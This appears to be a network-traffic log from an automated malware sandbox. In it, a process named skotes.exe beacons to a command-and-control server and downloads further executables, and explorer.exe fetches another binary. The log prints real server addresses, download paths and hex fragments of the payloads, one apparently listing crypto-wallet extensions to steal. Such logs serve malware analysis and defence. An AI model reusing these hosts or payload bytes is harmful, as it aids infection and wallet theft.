Dec 12, 2024 16:48:42.321408987 CET	1236	IN	Data Raw: 48 85 c0 75 15 48 8d 56 12 48 8d 0d da a7 02 00 e8 4d 15 00 00 e9 02 01 00 00 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c Data Ascii: HuHVHMVE3HI7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH\|$`Lt$Pt
Dec 12, 2024 16:48:42.321463108 CET	1236	IN	Data Raw: 48 48 8b 6c 24 40 4c 8b 64 24 50 85 c0 74 0b 49 8b ce e8 e3 2b 01 00 45 33 f6 49 8b cf e8 e8 dd 00 00 48 8b 5c 24 58 49 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa Data Ascii: HHl$@Ld$PtI+E3IH\$XIH A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2L\|$ H!)LH
Dec 12, 2024 16:48:42.321472883 CET	1236	IN	Data Raw: 2c 4c 8d 05 ee 9f 02 00 0f c8 89 44 24 2c ba 40 00 00 00 8b 44 24 30 0f c8 89 44 24 30 8b 44 24 34 0f c8 89 44 24 34 89 83 1c 10 00 00 e8 88 01 00 00 8b 44 24 28 45 33 c0 48 2b f0 48 8b cf 48 8d 46 58 48 89 83 00 10 00 00 8b 54 24 2c 48 03 d0 e8 Data Ascii: ,LD$,@D$0D$0D$4D$4D$(E3H+HHFXHT$,HhL$0&HHuHHeT$0LAHHsH}HJyD$0HHH*tHgHH;
Dec 12, 2024 16:48:42.321646929 CET	1236	IN	Data Raw: 50 20 00 00 48 8b 8f 28 20 00 00 ba 72 01 00 00 41 b8 01 00 00 00 ff 15 1a 95 02 00 4c 8b 87 48 20 00 00 4d 85 c0 74 72 48 8b 4f 08 ba 30 00 00 00 41 b9 01 00 00 00 ff 15 f9 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 30 20 00 00 ba Data Ascii: P H( rALH MtrHO0ALH AH0 0LH AH8 0LH AH@ 0H0 LO(E3LO E3H8 jHOHT$`tDD$lHT$hfD+D$d
Dec 12, 2024 16:48:42.321660042 CET	1236	IN	Data Raw: 24 50 4c 8d 0d 49 fc ff ff 48 8d 44 24 30 45 33 c0 48 8d 95 a0 1f 00 00 48 89 44 24 20 48 8b cf ff 15 2c 90 02 00 48 8b 4c 24 40 48 8b d8 e8 4b 1d 01 00 48 8b 4c 24 48 e8 41 1d 01 00 48 8b 4c 24 50 e8 37 1d 01 00 48 8b 8d 78 1f 00 00 48 85 c9 74 Data Ascii: $PLIHD$0E3HHD$ H,HL$@HKHL$HAHL$P7HxHtHHtH H3H!A^_^[]H\$Hl$Ht$H\|$ AVH 3IHDHtE33bHHtE33HaLHtE33HaH
Dec 12, 2024 16:48:42.321670055 CET	1236	IN	Data Raw: 24 30 4c 8b cb 48 c7 44 24 20 00 00 00 00 41 b8 00 04 00 00 48 8b 08 48 83 c9 02 e8 d2 13 01 00 41 b8 00 04 00 00 48 8d 94 24 30 04 00 00 48 8d 4c 24 30 e8 c6 5d 00 00 33 c9 41 b9 30 00 00 00 48 85 c0 74 17 4c 8d 05 52 93 02 00 48 8d 94 24 30 04 Data Ascii: $0LHD$ AHHAH$0HL$0]3A0HtLRH$0LHT$0H$0H3@HH_[LIKISMCMK SWHHHH3H$0HI{H\|$(HT$0LHD$ AHHVA0
Dec 12, 2024 16:48:42.321676016 CET	1236	IN	Data Raw: 02 00 e8 63 f8 ff ff b8 ff ff ff ff e9 6b 01 00 00 48 89 9c 24 98 10 00 00 48 8b 9e 08 10 00 00 48 89 ac 24 a0 10 00 00 48 89 bc 24 a8 10 00 00 4c 89 b4 24 60 10 00 00 48 3b 9e 10 10 00 00 0f 83 15 01 00 00 0f 1f 44 00 00 80 7b 11 73 0f 85 eb 00 Data Ascii: ckH$HH$H$L$`H;D{sHH[HHxLsLt$(M" LD$ \HL$P=)HHL$P$H%IHLHHHSHH
Dec 12, 2024 16:48:42.321764946 CET	1236	IN	Data Raw: 48 8d 84 24 d0 00 00 00 48 8b cd 4c 8d 8c 24 d0 10 00 00 48 89 44 24 20 4c 8d 84 24 d0 20 00 00 48 8d 54 24 30 e8 bc 08 00 00 eb 40 4c 8d 47 12 48 8d 94 24 d0 10 00 00 48 8d 8c 24 d0 20 00 00 e8 61 0b 00 00 41 3b c4 48 8d b4 24 d0 10 00 00 41 0f Data Ascii: H$HL$HD$ L$ HT$0@LGH$H$ aA;H$ADL$HIu+HIHI;8H'HWHVHHwAH$ 1L$0L$0L$0H$(1H$
Dec 12, 2024 16:48:42.441193104 CET	1236	IN	Data Raw: 20 00 00 41 5e 5f 5e c3 48 8d 15 37 81 02 00 48 8d 4f 10 e8 2a 08 00 00 48 8b d8 48 85 c0 74 37 48 8b 0d 03 9c 02 00 48 8d 54 24 50 48 89 4c 24 50 41 b8 08 00 00 00 48 c1 e9 18 80 c1 0d 88 4c 24 53 48 8b c8 e8 28 3f 00 00 48 85 c0 75 22 48 8b cb Data Ascii: A^_^H7HO*HHt7HHT$PHL$PAHL$SH(?Hu"HH_HHXsHHLOLs2H\|H@uH8pkgH HHHHOxKH80HuH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49951	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:42.432971954 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014440001&unit=246122658369
Dec 12, 2024 16:48:44.289215088 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49957	185.215.113.16	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:44.419589996 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 12, 2024 16:48:45.752664089 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:45 GMT Content-Type: application/octet-stream Content-Length: 970752 Last-Modified: Thu, 12 Dec 2024 15:22:54 GMT Connection: keep-alive ETag: "675affce-ed000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 ff 5a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELZg" w@08@@@d\|@(eu4@.text `.rdata@@.datalpH@.rsrc(e@f@@.relocuvZ@B
Dec 12, 2024 16:48:45.752760887 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DY
Dec 12, 2024 16:48:45.752772093 CET	1236	IN	Data Raw: e8 50 c1 01 00 68 30 24 44 00 e8 eb ef 01 00 59 c3 b9 04 25 4d 00 e8 9d 98 00 00 68 3f 24 44 00 e8 d5 ef 01 00 59 c3 56 8b f1 8d 4e 18 e8 b4 87 00 00 8d 4e 08 e8 ac 87 00 00 6a 28 56 e8 e2 ec 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 c7 05 Data Ascii: Ph0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMMMYMMM3MTMXM\
Dec 12, 2024 16:48:45.752779007 CET	1236	IN	Data Raw: 8b ce c7 06 44 c9 49 00 e8 74 02 00 00 ff 76 04 e8 82 e8 01 00 8b f3 c7 87 4c fd ff ff 40 c9 49 00 59 39 9f 54 fd ff ff 0f 87 f2 0f 04 00 ff b7 50 fd ff ff 89 9f 54 fd ff ff e8 58 e8 01 00 8b f3 c7 87 3c fd ff ff 40 c9 49 00 59 39 9f 44 fd ff ff Data Ascii: DItvL@IY9TPTX<@IY9D@D.,@IY9404Y$<IvY-
Dec 12, 2024 16:48:45.752806902 CET	1236	IN	Data Raw: 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 4d 00 66 a3 fc 16 4d 00 89 0d f4 16 4d 00 89 0d f8 16 4d 00 b9 fa 00 00 00 58 89 0d 14 17 4d 00 a3 44 15 4d 00 a3 48 15 4d Data Ascii: d3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q
Dec 12, 2024 16:48:45.752891064 CET	1236	IN	Data Raw: 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 Data Ascii: OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t
Dec 12, 2024 16:48:45.752901077 CET	1236	IN	Data Raw: 04 04 00 8b 55 f8 8b 5d fc 83 e8 01 0f 85 ba fe ff ff e9 1e 04 04 00 8b 5d fc 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 Data Ascii: U]]EC}Pl]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9Hm
Dec 12, 2024 16:48:45.752913952 CET	1236	IN	Data Raw: c2 04 00 55 8b ec 56 8b 75 08 57 8b f9 8b 06 89 07 8d 4f 10 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8d 46 10 83 61 08 00 50 e8 e0 d7 00 00 8d 46 20 8d 4f 20 83 61 08 00 50 e8 d0 d7 00 00 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 40 89 51 Data Ascii: UVuWOFGFGFGFaPF O aP_^]33@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL
Dec 12, 2024 16:48:45.752924919 CET	1236	IN	Data Raw: c9 c2 0c 00 55 8b ec b8 00 00 01 00 e8 9e f1 03 00 56 57 68 ff 7f 00 00 8d 85 00 00 ff ff 8b fa 50 ff 31 ff 15 0c c2 49 00 8b f0 8b cf 8d 85 00 00 ff ff 50 e8 7d 3d 00 00 85 f6 5f 0f 95 c0 5e c9 c3 55 8b ec b8 58 00 01 00 e8 60 f1 03 00 a0 64 13 Data Ascii: UVWhP1IP}=_^UX`dMVuWG~"uQVqYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5M
Dec 12, 2024 16:48:45.752934933 CET	1236	IN	Data Raw: 53 56 57 6a 2c 8d 45 c8 c7 45 c4 30 00 00 00 6a 00 50 8b f9 e8 b2 f0 01 00 8b 45 14 83 c4 0c 8b 8f d0 09 00 00 33 f6 89 4d fc 6a 08 5b 6a 01 5a 2d 00 02 00 00 0f 85 eb fb 03 00 6a 40 5e 6a f5 8b cf e8 10 00 00 00 85 77 0c 0f 85 9f fc 03 00 5f 5e Data Ascii: SVWj,EE0jPE3Mj[jZ-j@^jw_^[UQSVWjYwxvU};tPuEEP_^[UVjUYa~uNN^]FHUVE
Dec 12, 2024 16:48:45.872534990 CET	1236	IN	Data Raw: 00 8b ce e8 10 72 00 00 83 c6 10 83 ef 01 75 f1 83 0d 64 23 4d 00 ff b8 90 19 4d 00 5f 5e 66 89 1d 24 1b 4d 00 89 1d 28 1b 4d 00 89 1d 2c 1b 4d 00 88 1d 30 1b 4d 00 89 1d 34 1b 4d 00 89 1d 38 1b 4d 00 88 1d 3c 1b 4d 00 89 1d 40 1b 4d 00 89 1d 60 Data Ascii: rud#MM_^f$M(M,M0M4M8M<M@M`#M[UVujP@#P[^]USVW3Ex}WtKEE33ft0E}PEEf9Et#C_fu}!_^[AU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49970	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:50.070673943 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014441001&unit=246122658369
Dec 12, 2024 16:48:51.420921087 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49975	185.215.113.16	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:51.876072884 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 12, 2024 16:48:53.217140913 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:52 GMT Content-Type: application/octet-stream Content-Length: 1807360 Last-Modified: Thu, 12 Dec 2024 15:24:14 GMT Connection: keep-alive ETag: "675b001e-1b9400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 60 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 79 8d 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(`i@iy@M$a$$ $h@.rsrc$x@.idata $z@ *$\|@tdoajogz`O~@xfulpslqPin@.taggant0`i"r@
Dec 12, 2024 16:48:53.217171907 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:48:53.217185020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:48:53.217304945 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:48:53.217318058 CET	1236	IN	Data Raw: f7 4f 07 5f 39 07 22 fc f9 14 63 73 07 cc c5 1c b5 e8 89 12 39 c4 d0 e2 e0 cc 01 42 d5 48 fa 0d c9 86 f2 f4 b8 7e ea 1c 14 22 dd a0 1a ae c8 ee 30 ac da f2 2c 3c ca 2e 05 cc bd cb 9f dd b1 bb f5 d0 a5 ca ed 4a fa f2 f7 f4 cd 4a dd ec 89 f3 ba ad Data Ascii: O_9"cs9BH~"0,<.JJ%wj!D-3){]A-NWHch+9a?:8`>]Qu4w8-G!<M;5VNCFo5]":"OSJi
Dec 12, 2024 16:48:53.217336893 CET	1236	IN	Data Raw: cb a4 c8 b6 d6 bc fe fb f5 cd 0c 50 61 01 5f 64 2a e4 45 ac c7 ac 95 e3 7f ab a5 86 c6 dc 38 c4 6c 26 8b b1 bd 2b 69 23 1c 1f a2 74 91 23 8a 1e e4 5f 8b 8d 9e 03 25 23 c0 67 90 dc 27 ce d7 65 7d 15 c7 92 3d 3b 8b 41 25 3d c8 6d 05 2c 8a 5f 46 cb Data Ascii: Pa_d*E8l&+i#t#_%#g'e}=;A%=m,_Fo&`AXA&&t,xh$TlON_:'i8G2,%Vuf'I_]\b#Ny"Qz".+Lf9p#bhv0UZpZ
Dec 12, 2024 16:48:53.217350006 CET	1236	IN	Data Raw: f6 17 f2 5e cb 44 a3 8a 3d d6 8f eb c5 e5 42 dd ca 68 93 72 f6 35 7a f8 06 06 3a ec 78 cc a5 7a 0d a6 9f 80 7e 14 52 f1 90 48 a4 f2 40 09 4e 34 c3 b2 10 f4 bc e4 15 0f 26 d8 34 f8 96 88 9a fa fe ec 97 ee 70 35 aa 77 cb 8e da 12 cb d4 d1 5e e1 4d Data Ascii: ^D=Bhr5z:xz~RH@N4&4p5w^Ma<+e5^6X*BM"_pV:N<!1,^or~&9el`PKUHM#N4o&M\TVKl=\|v9RQ
Dec 12, 2024 16:48:53.217477083 CET	1000	IN	Data Raw: bc ff 97 17 57 f0 69 67 3e 6b 8a f6 57 4b 6e 25 05 da 91 3e 3d 55 cd df bd 34 8a f0 34 09 e2 e2 22 3f 23 62 c5 d5 c1 f3 58 48 c4 ee dd 26 f3 ee 6c da a2 a6 bd dc 0c 6b 01 58 eb 02 95 da c3 d6 c6 74 0f 04 eb 1f 8a f2 e1 61 aa 3c 05 18 f3 fa 58 06 Data Ascii: Wig>kWKn%>=U44"?#bXH&lkXta<X+^vgKb].ffd#h]?s\|f>]""\I= :9b5d}TPN5b]:tM}H
Dec 12, 2024 16:48:53.217489958 CET	1236	IN	Data Raw: cd d1 38 b6 dd 44 9b 1c 41 d5 a1 65 25 4e cb c2 4d 06 98 82 c5 00 10 63 9f d0 07 1d 6d e5 49 e3 64 4d 13 af 2f 2d e6 47 5a c7 59 e3 cf b0 07 c3 73 d0 0e ef 75 fd 94 ee 60 0e 52 4c be 6c 8e f3 8b ec c3 f0 e4 d5 4d e3 46 4e 93 61 02 08 5f e3 cd 4c Data Ascii: 8DAe%NMcmIdM/-GZYsu`RLlMFNa_LB -[cA.2M,L'T\?M\|V52~#){(Kn]B]+H3_^CO(Z\tHn!<A*#Bi
Dec 12, 2024 16:48:53.217500925 CET	1236	IN	Data Raw: 91 00 c4 4e f9 0d f2 1e 40 8b 06 3f 0d 74 cb fc fe f2 95 06 d6 75 a2 77 d7 28 cc 2a 25 da f5 7a 23 5f 85 6b c3 09 fe e2 cd 4c c7 a2 bf 09 04 0a f9 58 a4 7a c5 54 0b 64 21 0c 98 86 39 06 3a fc c4 d4 d7 65 ca cc a6 f0 c4 a0 0a 93 f9 04 a6 9c 50 b8 Data Ascii: N@?tuw(*%z#_kLXzTd!9:eP-VLWH"LB6kNVmYod"}#BZHx#)r9&c1W:?(W)^9
Dec 12, 2024 16:48:53.337193966 CET	1236	IN	Data Raw: b5 b2 45 73 c5 0c 5a e4 59 6f b4 49 75 b9 20 71 45 57 37 a0 ba 7f c5 10 bc b7 ef 06 c5 9c e9 34 73 ca 07 cb 36 65 61 1c bc 51 ee 4c 4c d8 16 3f bb da c6 82 e7 46 85 5d bb 15 d4 02 16 b4 d8 c5 f8 b8 32 27 37 25 92 42 b8 29 c8 a6 36 5b 36 65 c5 19 Data Ascii: EsZYoIu qEW74s6eaQLL?F]2'7%B)6[6e>%4i*VWnj+NFg77S].ZO\guM@/Hlf#O\|/Qi+8P4(sAN a3 s7R\|Z9L<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49976	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:51.982600927 CET	234	OUT	GET /fcxcx.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:48:53.308237076 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 10 Dec 2024 22:39:28 GMT ETag: "4b200-628f2276e1a78" Accept-Ranges: bytes Content-Length: 307712 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 02 03 00 4b 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @@K H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
Dec 12, 2024 16:48:53.308260918 CET	1236	IN	Data Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00 Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
Dec 12, 2024 16:48:53.308273077 CET	1236	IN	Data Raw: 62 00 32 00 31 00 69 00 59 00 58 00 51 00 4b 00 5a 00 6d 00 68 00 70 00 62 00 47 00 46 00 6f 00 5a 00 57 00 6c 00 74 00 5a 00 32 00 78 00 70 00 5a 00 32 00 35 00 6b 00 5a 00 47 00 74 00 71 00 5a 00 32 00 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00 Data Ascii: b21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm
Dec 12, 2024 16:48:53.308408022 CET	1236	IN	Data Raw: 31 00 6c 00 61 00 57 00 31 00 6f 00 62 00 48 00 42 00 74 00 5a 00 32 00 70 00 75 00 61 00 6d 00 39 00 77 00 61 00 47 00 68 00 77 00 61 00 32 00 74 00 76 00 62 00 47 00 70 00 77 00 59 00 58 00 78 00 51 00 61 00 47 00 46 00 75 00 64 00 47 00 39 00 Data Ascii: 1laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhProfilesSOFTWASkyBoxRE\MicrSkyBoxosoft\WinSkyBoxdows NT\CurrentVersSky
Dec 12, 2024 16:48:53.308419943 CET	1236	IN	Data Raw: e2 25 0c bc 3c 49 8b 28 0d 95 41 ff a8 01 71 39 0c b3 de 08 b4 e4 9c d8 56 c1 90 64 cb 84 61 7b 32 b6 70 d5 6c 5c 74 48 b8 57 42 d0 54 00 6f 00 74 00 61 00 6c 00 20 00 6f 00 66 00 20 00 52 00 41 00 4d 00 45 00 78 00 65 00 63 00 75 00 74 00 61 00 Data Ascii: %<I(Aq9Vda{2pl\tHWBTotal of RAMExecutablePathRj068@\|9/4CDT{2#=LBN.f($v[Im%rdh\]elpHP^FWXE,?k:AOg
